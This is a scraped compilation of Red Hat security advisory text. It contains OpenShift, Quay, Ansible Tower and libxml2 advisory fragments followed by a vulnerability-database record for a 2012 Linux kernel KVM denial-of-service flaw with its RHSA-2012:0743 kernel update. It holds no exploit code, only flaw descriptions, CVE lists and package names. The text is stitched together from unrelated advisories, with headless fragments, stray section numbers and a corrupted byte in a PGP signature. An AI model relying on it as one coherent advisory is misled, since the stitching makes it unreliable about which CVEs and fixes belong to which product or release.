1883927 - Deployment with encryption at rest is failing to bring up OSD pods
1885175 - Handle disappeared underlying device for encrypted OSD
1885428 - panic seen in rook-ceph during uninstall - "close of closed channel"
1885648 - [Tracker for https://bugzilla.redhat.com/show_bug.cgi?id=1885700] FSTYPE for localvolumeset devices shows up as ext2 after uninstall
1885971 - ocs-storagecluster-cephobjectstore doesn't report true state of RGW
1886308 - Default VolumeSnapshot Classes not created in External Mode
1886348 - osd removal job failed with status "Error"
1886551 - Clone creation failed after timeout of 5 hours of Azure platrom for 3 CephFS PVCs ( PVC sizes: 1, 25 and 100 GB)
1886709 - [External] RGW storageclass disappears after upgrade from OCS 4.5 to 4.6
1886859 - OCS 4.6: Uninstall stuck indefinitely if any Ceph pods are in Pending state before uninstall
1886873 - [OCS 4.6 External/Internal Uninstall] - Storage Cluster deletion stuck indefinitely, "failed to delete object store", remaining users: [noobaa-ceph-objectstore-user]
1888583 - [External] When deployment is attempted without specifying the monitoring-endpoint while generating JSON, the CSV is stuck in installing state
1888593 - [External] Add validation for monitoring-endpoint and port in the exporter script
1888614 - [External] Unreachable monitoring-endpoint used during deployment causes ocs-operator to crash
1889441 - Traceback error message while running OCS 4.6 must-gather
1889683 - [GSS] Noobaa Problem when setting public access to a bucket
1889866 - Post node power off/on, an unused MON PVC still stays back in the cluster
1890183 - [External] ocs-operator logs are filled with "failed to reconcile metrics exporter"
1890638 - must-gather helper pod should be deleted after collecting ceph crash info
1890971 - [External] RGW metrics are not available if anything else except 9283 is provided as the monitoring-endpoint-port
1891856 - ocs-metrics-exporter pod should have tolerations for OCS taint
1892206 - [GSS] Ceph image/version mismatch
1892234 - clone #95 creation failed for CephFS PVC ( 10 GB PVC size) during multiple clones creation test
1893624 - Must Gather is not collecting the tar file from NooBaa diagnose
1893691 - OCS4.6 must_gather failes to complete in 600sec
1893714 - Bad response for upload an object with encryption
1895402 - Mon pods didn't get upgraded in 720 second timeout from OCS 4.5 upgrade to 4.6
1896298 - [RFE] Monitoring for Namespace buckets and resources
1896831 - Clone#452 for RBD PVC ( PVC size 1 GB) failed to be created for 600 secs
1898521 - [CephFS] Deleting cephfsplugin pod along with app pods will make PV remain in Released state after deleting the PVC
1902627 - must-gather should wait for debug pods to be in ready state
1904171 - RGW Service is unavailable for a short period during upgrade to OCS 4.6
5.
Bug Fix(es):
* NVD feed fixed in Clair-v2 (clair-jwt image)
3. Solution:
Download the release images via:
quay.io/redhat/quay:v3.3.3
quay.io/redhat/clair-jwt:v3.3.3
quay.io/redhat/quay-builder:v3.3.3
quay.io/redhat/clair:v3.3.3
4. Bugs fixed (https://bugzilla.redhat.com/):
1905758 - CVE-2020-27831 quay: email notifications authorization bypass
1905784 - CVE-2020-27832 quay: persistent XSS in repository notification display
5. JIRA issues fixed (https://issues.jboss.org/):
PROJQUAY-1124 - NVD feed is broken for latest Clair v2 version
6. Solution:
For information on upgrading Ansible Tower, reference the Ansible Tower
Upgrade and Migration Guide:
https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/
index.html
4. Bugs fixed (https://bugzilla.redhat.com/):
1790277 - CVE-2019-20372 nginx: HTTP request smuggling in configurations with URL redirect used as error_page
1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method
1850004 - CVE-2020-11023 jquery: Passing HTML containing <option> elements to manipulation methods could result in untrusted code execution
1911314 - CVE-2020-35678 python-autobahn: allows redirect header injection
1928847 - CVE-2021-20253 ansible-tower: Privilege escalation via job isolation escape
5.
Bug Fix(es):
* Aggregator pod tries to parse ConfigMaps without results (BZ#1899479)
* The compliancesuite object returns error with ocp4-cis tailored profile
(BZ#1902251)
* The compliancesuite does not trigger when there are multiple rhcos4
profiles added in scansettingbinding object (BZ#1902634)
* [OCP v46] Not all remediations get applied through machineConfig although
the status of all rules shows Applied in ComplianceRemediations object
(BZ#1907414)
* The profile parser pod deployment and associated profiles should get
removed after upgrade the compliance operator (BZ#1908991)
* Applying the "rhcos4-moderate" compliance profile leads to Ignition error
"something else exists at that path" (BZ#1909081)
* [OCP v46] Always update the default profilebundles on Compliance operator
startup (BZ#1909122)
3. Bugs fixed (https://bugzilla.redhat.com/):
1899479 - Aggregator pod tries to parse ConfigMaps without results
1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service
1902251 - The compliancesuite object returns error with ocp4-cis tailored profile
1902634 - The compliancesuite does not trigger when there are multiple rhcos4 profiles added in scansettingbinding object
1907414 - [OCP v46] Not all remediations get applied through machineConfig although the status of all rules shows Applied in ComplianceRemediations object
1908991 - The profile parser pod deployment and associated profiles should get removed after upgrade the compliance operator
1909081 - Applying the "rhcos4-moderate" compliance profile leads to Ignition error "something else exists at that path"
1909122 - [OCP v46] Always update the default profilebundles on Compliance operator startup
5. Bugs fixed (https://bugzilla.redhat.com/):
1772014 - CVE-2019-18874 python-psutil: double free because of refcount mishandling
5. To check for available updates, use the OpenShift Console
or the CLI oc command. Instructions for upgrading a cluster are available
at
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster
- -between-minor.html#understanding-upgrade-channels_updating-cluster-between
- -minor. Solution:
For OpenShift Container Platform 4.7 see the following documentation, which
will be updated shortly for this release, for important instructions on how
to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel
ease-notes.html
Details on how to access this content are available at
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster
- -cli.html. Bugs fixed (https://bugzilla.redhat.com/):
1823765 - nfd-workers crash under an ipv6 environment
1838802 - mysql8 connector from operatorhub does not work with metering operator
1838845 - Metering operator can't connect to postgres DB from Operator Hub
1841883 - namespace-persistentvolumeclaim-usage query returns unexpected values
1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
1868294 - NFD operator does not allow customisation of nfd-worker.conf
1882310 - CVE-2020-24750 jackson-databind: Serialization gadgets in com.pastdev.httpcomponents.configuration.JndiConfiguration
1890672 - NFD is missing a build flag to build correctly
1890741 - path to the CA trust bundle ConfigMap is broken in report operator
1897346 - NFD worker pods not scheduler on a 3 node master/worker cluster
1898373 - Metering operator failing upgrade from 4.4 to 4.6 channel
1900125 - FIPS error while generating RSA private key for CA
1906129 - OCP 4.7: Node Feature Discovery (NFD) Operator in CrashLoopBackOff when deployed from OperatorHub
1908492 - OCP 4.7: Node Feature Discovery (NFD) Operator Custom Resource Definition file in olm-catalog is not in sync with the one in manifests dir leading to failed deployment from OperatorHub
1913837 - The CI and ART 4.7 metering images are not mirrored
1914869 - OCP 4.7 NFD - Operand configuration options for NodeFeatureDiscovery are empty, no supported image for ppc64le
1916010 - olm skip range is set to the wrong range
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation
1923998 - NFD Operator is failing to update and remains in Replacing state
5. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: libxml2 security update
Advisory ID: RHSA-2020:4479-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2020:4479
Issue date: 2020-11-03
CVE Names: CVE-2019-19956 CVE-2019-20388 CVE-2020-7595
====================================================================
1. Summary:
An update for libxml2 is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64
3. Description:
The libxml2 library is a development toolbox providing the implementation
of various XML standards.
Security Fix(es):
* libxml2: memory leak in xmlParseBalancedChunkMemoryRecover in parser.c
(CVE-2019-19956)
* libxml2: memory leak in xmlSchemaPreRun in xmlschemas.c (CVE-2019-20388)
* libxml2: infinite loop in xmlStringLenDecodeEntities in some end-of-file
situations (CVE-2020-7595)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 8.3 Release Notes linked from the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
The desktop must be restarted (log out, then log back in) for this update
to take effect.
5. Package List:
Red Hat Enterprise Linux AppStream (v. 8):
aarch64:
libxml2-debuginfo-2.9.7-8.el8.aarch64.rpm
libxml2-debugsource-2.9.7-8.el8.aarch64.rpm
libxml2-devel-2.9.7-8.el8.aarch64.rpm
python3-libxml2-debuginfo-2.9.7-8.el8.aarch64.rpm
ppc64le:
libxml2-debuginfo-2.9.7-8.el8.ppc64le.rpm
libxml2-debugsource-2.9.7-8.el8.ppc64le.rpm
libxml2-devel-2.9.7-8.el8.ppc64le.rpm
python3-libxml2-debuginfo-2.9.7-8.el8.ppc64le.rpm
s390x:
libxml2-debuginfo-2.9.7-8.el8.s390x.rpm
libxml2-debugsource-2.9.7-8.el8.s390x.rpm
libxml2-devel-2.9.7-8.el8.s390x.rpm
python3-libxml2-debuginfo-2.9.7-8.el8.s390x.rpm
x86_64:
libxml2-debuginfo-2.9.7-8.el8.i686.rpm
libxml2-debuginfo-2.9.7-8.el8.x86_64.rpm
libxml2-debugsource-2.9.7-8.el8.i686.rpm
libxml2-debugsource-2.9.7-8.el8.x86_64.rpm
libxml2-devel-2.9.7-8.el8.i686.rpm
libxml2-devel-2.9.7-8.el8.x86_64.rpm
python3-libxml2-debuginfo-2.9.7-8.el8.i686.rpm
python3-libxml2-debuginfo-2.9.7-8.el8.x86_64.rpm
Red Hat Enterprise Linux BaseOS (v. 8):
Source:
libxml2-2.9.7-8.el8.src.rpm
aarch64:
libxml2-2.9.7-8.el8.aarch64.rpm
libxml2-debuginfo-2.9.7-8.el8.aarch64.rpm
libxml2-debugsource-2.9.7-8.el8.aarch64.rpm
python3-libxml2-2.9.7-8.el8.aarch64.rpm
python3-libxml2-debuginfo-2.9.7-8.el8.aarch64.rpm
ppc64le:
libxml2-2.9.7-8.el8.ppc64le.rpm
libxml2-debuginfo-2.9.7-8.el8.ppc64le.rpm
libxml2-debugsource-2.9.7-8.el8.ppc64le.rpm
python3-libxml2-2.9.7-8.el8.ppc64le.rpm
python3-libxml2-debuginfo-2.9.7-8.el8.ppc64le.rpm
s390x:
libxml2-2.9.7-8.el8.s390x.rpm
libxml2-debuginfo-2.9.7-8.el8.s390x.rpm
libxml2-debugsource-2.9.7-8.el8.s390x.rpm
python3-libxml2-2.9.7-8.el8.s390x.rpm
python3-libxml2-debuginfo-2.9.7-8.el8.s390x.rpm
x86_64:
libxml2-2.9.7-8.el8.i686.rpm
libxml2-2.9.7-8.el8.x86_64.rpm
libxml2-debuginfo-2.9.7-8.el8.i686.rpm
libxml2-debuginfo-2.9.7-8.el8.x86_64.rpm
libxml2-debugsource-2.9.7-8.el8.i686.rpm
libxml2-debugsource-2.9.7-8.el8.x86_64.rpm
python3-libxml2-2.9.7-8.el8.x86_64.rpm
python3-libxml2-debuginfo-2.9.7-8.el8.i686.rpm
python3-libxml2-debuginfo-2.9.7-8.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2019-19956
https://access.redhat.com/security/cve/CVE-2019-20388
https://access.redhat.com/security/cve/CVE-2020-7595
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.3_release_notes/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBX6I21tzjgjWX9erEAQjPWQ/9HUwbjkw/cY8D3Rd6eR/cQbQjwrpJdOHJ
YIZQ3ZgphMhXXNMZmPfFTI2cwLkirN7uH73KtT3+LOsepnzhyhRghQgRUaLYFXgl
OMUCjzevES36P3bY9N2rk6xvfU4pnpeWb94t6sEiJuWdCDIs52UY41ODOnGVJorw
mxYe8rtP3FAAicPOG/OEWFiTZxH3inn2TbWixRHH1eG7ySvjbQfbfjA4e5zoY84K
EizU1IVu9rJfgnwfknKDote31LjHzvbw5SsCyAHlMz6f4Z7UhHefOlVAyB6XHFjF
rN5ADjtF1B5wjxtYSGmnfNxsrdtDyOC5T31EA2EC5qyQ6XBL9GUix8BPmK0fPXxI
BXXNYmwSXsIaeAwq6d5LbSBNI5ntU6tDyZ7lvDNkEgI4sRxIBZ84IVeDbLcgOwJv
OA/M0eg2o7uKiNF0DV4ZVHCVHeH5LoaBhrq/0B21FkM9JxRX8vEwhavkR9oVW331
yFlmYiZpOQkD6P0omCtwED4jmCg9hdRCfXCbUbYpmpWoK9Plp3hY/v2RfUEMROYV
R+o8hCb1wbiyIPLVvsuVppM/rUUfuQ6sd9FwwsbjgdeCrx+++wCX/NwlzIPwtT4F
Gnj1SaXE0/5Ilyb3Tqq1QYcLe7YfVk/0Iip9V+t4HPyWRVOFFYexqjXZCNt2L8JS
NiiH7H8gSOo\xba8C
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. Solution:
See the documentation at:
https://access.redhat.com/documentation/en-us/openshift_container_platform/
4.6/html/serverless_applications/index
4. Bugs fixed (https://bugzilla.redhat.com/):
1874857 - CVE-2020-24553 golang: default Content-Type setting in net/http/cgi and net/http/fcgi could cause XSS
1897635 - CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers
1897643 - CVE-2020-28366 golang: malicious symbol names can lead to code execution at build time
1897646 - CVE-2020-28367 golang: improper validation of cgo flags can lead to code execution at build time
1906381 - Release of OpenShift Serverless Serving 1.12.0
1906382 - Release of OpenShift Serverless Eventing 1.12.0
5 |
|
var-201205-0297
|
The Linux kernel before 3.3.1, when KVM is used, allows guest OS users to cause a denial of service (host OS crash) by leveraging administrative access to the guest OS, related to the pmd_none_or_clear_bad function and page faults for huge pages. Cross scripting and preconfigured password vulnerabilities have been reported to exist in the Quantum Scalar i500, Dell ML6000 and IBM TS3310 tape libraries. The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users.
Linux Kernel 2.6.x is vulnerable. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: kernel security and bug fix update
Advisory ID: RHSA-2012:0743-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0743.html
Issue date: 2012-06-18
CVE Names: CVE-2012-0044 CVE-2012-1179 CVE-2012-2119
CVE-2012-2121 CVE-2012-2123 CVE-2012-2136
CVE-2012-2137 CVE-2012-2372 CVE-2012-2373
=====================================================================
1. Summary:
Updated kernel packages that fix multiple security issues and several bugs
are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having
important security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3.
This update fixes the following security issues:
* A local, unprivileged user could use an integer overflow flaw in
drm_mode_dirtyfb_ioctl() to cause a denial of service or escalate their
privileges. (CVE-2012-0044, Important)
* A buffer overflow flaw was found in the macvtap device driver, used for
creating a bridged network between the guest and the host in KVM
(Kernel-based Virtual Machine) environments. A privileged guest user in a
KVM guest could use this flaw to crash the host. Note: This issue only
affected hosts that have the vhost_net module loaded with the
experimental_zcopytx module option enabled (it is not enabled by default),
and that also have macvtap configured for at least one guest.
(CVE-2012-2119, Important)
* When a set user ID (setuid) application is executed, certain personality
flags for controlling the application's behavior are cleared (that is, a
privileged application will not be affected by those flags). It was found
that those flags were not cleared if the application was made privileged
via file system capabilities. A local, unprivileged user could use this
flaw to change the behavior of such applications, allowing them to bypass
intended restrictions. Note that for default installations, no application
shipped by Red Hat for Red Hat Enterprise Linux is made privileged via file
system capabilities. (CVE-2012-2123, Important)
* It was found that the data_len parameter of the sock_alloc_send_pskb()
function in the Linux kernel's networking implementation was not validated
before use. A privileged guest user in a KVM guest could use this flaw to
crash the host or, possibly, escalate their privileges on the host.
(CVE-2012-2136, Important)
* A buffer overflow flaw was found in the setup_routing_entry() function in
the KVM subsystem of the Linux kernel in the way the Message Signaled
Interrupts (MSI) routing entry was handled. A local, unprivileged user
could use this flaw to cause a denial of service or, possibly, escalate
their privileges. (CVE-2012-2137, Important)
* A race condition was found in the Linux kernel's memory management
subsystem in the way pmd_none_or_clear_bad(), when called with mmap_sem in
read mode, and Transparent Huge Pages (THP) page faults interacted. A
privileged user in a KVM guest with the ballooning functionality enabled
could potentially use this flaw to crash the host. A local, unprivileged
user could use this flaw to crash the system. (CVE-2012-1179, Moderate)
* A flaw was found in the way device memory was handled during guest device
removal. Upon successful device removal, memory used by the device was not
properly unmapped from the corresponding IOMMU or properly released from
the kernel, leading to a memory leak. A malicious user on a KVM host who
has the ability to assign a device to a guest could use this flaw to crash
the host. (CVE-2012-2121, Moderate)
* A flaw was found in the Linux kernel's Reliable Datagram Sockets (RDS)
protocol implementation. A local, unprivileged user could use this flaw to
cause a denial of service. (CVE-2012-2372, Moderate)
* A race condition was found in the Linux kernel's memory management
subsystem in the way pmd_populate() and pte_offset_map_lock() interacted on
32-bit x86 systems with more than 4GB of RAM. A local, unprivileged user
could use this flaw to cause a denial of service. (CVE-2012-2373, Moderate)
Red Hat would like to thank Chen Haogang for reporting CVE-2012-0044.
This update also fixes several bugs. Documentation for these changes will
be available shortly from the Technical Notes document linked to in the
References section.
Users should upgrade to these updated packages, which contain backported
patches to correct these issues, and fix the bugs noted in the Technical
Notes. The system must be rebooted for this update to take effect.
4. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/knowledge/articles/11258
To install kernel packages manually, use "rpm -ivh [package]". Do not
use "rpm -Uvh" as that will remove the running kernel binaries from
your system. You may use "rpm -e" to remove old kernels after
determining that the new kernel functions properly on your system.
5. Bugs fixed (http://bugzilla.redhat.com/):
772894 - CVE-2012-0044 kernel: drm: integer overflow in drm_mode_dirtyfb_ioctl()
803793 - CVE-2012-1179 kernel: thp:__split_huge_page() mapcount != page_mapcount BUG_ON()
806722 - CVE-2012-2123 kernel: fcaps: clear the same personality flags as suid when fcaps are used
814149 - CVE-2012-2121 kvm: device assignment page leak
814278 - CVE-2012-2119 kernel: macvtap: zerocopy: vector length is not validated before pinning user pages
814657 - kernel crash at ieee80211_mgd_probe_ap_send [rhel-6.2.z]
816151 - CVE-2012-2137 kernel: kvm: buffer overflow in kvm_set_irq()
816226 - add option to disable 5GHz band to iwlwifi [rhel-6.2.z]
816289 - CVE-2012-2136 kernel: net: insufficient data_len validation in sock_alloc_send_pskb()
818504 - Disable LRO for all NICs that have LRO enabled [rhel-6.2.z]
818505 - xen: fix drive naming [rhel-6.2.z]
819614 - 2.6.32-220 kernel does not work on a HP DL385G6 with HP Smart Array P410 controller and hpsa driver [rhel-6.2.z]
822754 - CVE-2012-2372 kernel: rds-ping cause kernel panic
822821 - CVE-2012-2373 kernel: mm: read_pmd_atomic: 32bit PAE pmd walk vs pmd_populate SMP race condition
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm
i386:
kernel-2.6.32-220.23.1.el6.i686.rpm
kernel-debug-2.6.32-220.23.1.el6.i686.rpm
kernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm
kernel-debug-devel-2.6.32-220.23.1.el6.i686.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm
kernel-devel-2.6.32-220.23.1.el6.i686.rpm
kernel-headers-2.6.32-220.23.1.el6.i686.rpm
perf-2.6.32-220.23.1.el6.i686.rpm
perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm
noarch:
kernel-doc-2.6.32-220.23.1.el6.noarch.rpm
kernel-firmware-2.6.32-220.23.1.el6.noarch.rpm
x86_64:
kernel-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debug-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debug-devel-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm
kernel-devel-2.6.32-220.23.1.el6.x86_64.rpm
kernel-headers-2.6.32-220.23.1.el6.x86_64.rpm
perf-2.6.32-220.23.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm
i386:
kernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm
perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm
python-perf-2.6.32-220.23.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm
x86_64:
kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
python-perf-2.6.32-220.23.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm
noarch:
kernel-doc-2.6.32-220.23.1.el6.noarch.rpm
kernel-firmware-2.6.32-220.23.1.el6.noarch.rpm
x86_64:
kernel-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debug-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debug-devel-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm
kernel-devel-2.6.32-220.23.1.el6.x86_64.rpm
kernel-headers-2.6.32-220.23.1.el6.x86_64.rpm
perf-2.6.32-220.23.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm
x86_64:
kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
python-perf-2.6.32-220.23.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm
i386:
kernel-2.6.32-220.23.1.el6.i686.rpm
kernel-debug-2.6.32-220.23.1.el6.i686.rpm
kernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm
kernel-debug-devel-2.6.32-220.23.1.el6.i686.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm
kernel-devel-2.6.32-220.23.1.el6.i686.rpm
kernel-headers-2.6.32-220.23.1.el6.i686.rpm
perf-2.6.32-220.23.1.el6.i686.rpm
perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm
noarch:
kernel-doc-2.6.32-220.23.1.el6.noarch.rpm
kernel-firmware-2.6.32-220.23.1.el6.noarch.rpm
ppc64:
kernel-2.6.32-220.23.1.el6.ppc64.rpm
kernel-bootwrapper-2.6.32-220.23.1.el6.ppc64.rpm
kernel-debug-2.6.32-220.23.1.el6.ppc64.rpm
kernel-debug-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm
kernel-debug-devel-2.6.32-220.23.1.el6.ppc64.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm
kernel-debuginfo-common-ppc64-2.6.32-220.23.1.el6.ppc64.rpm
kernel-devel-2.6.32-220.23.1.el6.ppc64.rpm
kernel-headers-2.6.32-220.23.1.el6.ppc64.rpm
perf-2.6.32-220.23.1.el6.ppc64.rpm
perf-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm
s390x:
kernel-2.6.32-220.23.1.el6.s390x.rpm
kernel-debug-2.6.32-220.23.1.el6.s390x.rpm
kernel-debug-debuginfo-2.6.32-220.23.1.el6.s390x.rpm
kernel-debug-devel-2.6.32-220.23.1.el6.s390x.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.s390x.rpm
kernel-debuginfo-common-s390x-2.6.32-220.23.1.el6.s390x.rpm
kernel-devel-2.6.32-220.23.1.el6.s390x.rpm
kernel-headers-2.6.32-220.23.1.el6.s390x.rpm
kernel-kdump-2.6.32-220.23.1.el6.s390x.rpm
kernel-kdump-debuginfo-2.6.32-220.23.1.el6.s390x.rpm
kernel-kdump-devel-2.6.32-220.23.1.el6.s390x.rpm
perf-2.6.32-220.23.1.el6.s390x.rpm
perf-debuginfo-2.6.32-220.23.1.el6.s390x.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.s390x.rpm
x86_64:
kernel-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debug-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debug-devel-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm
kernel-devel-2.6.32-220.23.1.el6.x86_64.rpm
kernel-headers-2.6.32-220.23.1.el6.x86_64.rpm
perf-2.6.32-220.23.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/kernel-2.6.32-220.23.1.el6.src.rpm
i386:
kernel-debug-debuginfo-2.6.32-220.23.1.el6.i686.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-220.23.1.el6.i686.rpm
perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm
python-perf-2.6.32-220.23.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.i686.rpm
ppc64:
kernel-debug-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm
kernel-debuginfo-common-ppc64-2.6.32-220.23.1.el6.ppc64.rpm
perf-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm
python-perf-2.6.32-220.23.1.el6.ppc64.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.ppc64.rpm
s390x:
kernel-debug-debuginfo-2.6.32-220.23.1.el6.s390x.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.s390x.rpm
kernel-debuginfo-common-s390x-2.6.32-220.23.1.el6.s390x.rpm
kernel-kdump-debuginfo-2.6.32-220.23.1.el6.s390x.rpm
perf-debuginfo-2.6.32-220.23.1.el6.s390x.rpm
python-perf-2.6.32-220.23.1.el6.s390x.rpm
python-perf-debuginfo-2.6.32-220.23.1.el6.s390x.rpm
x86_64:
kernel-debug-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-220.23.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-220.23.1.el6.x86_64.rpm
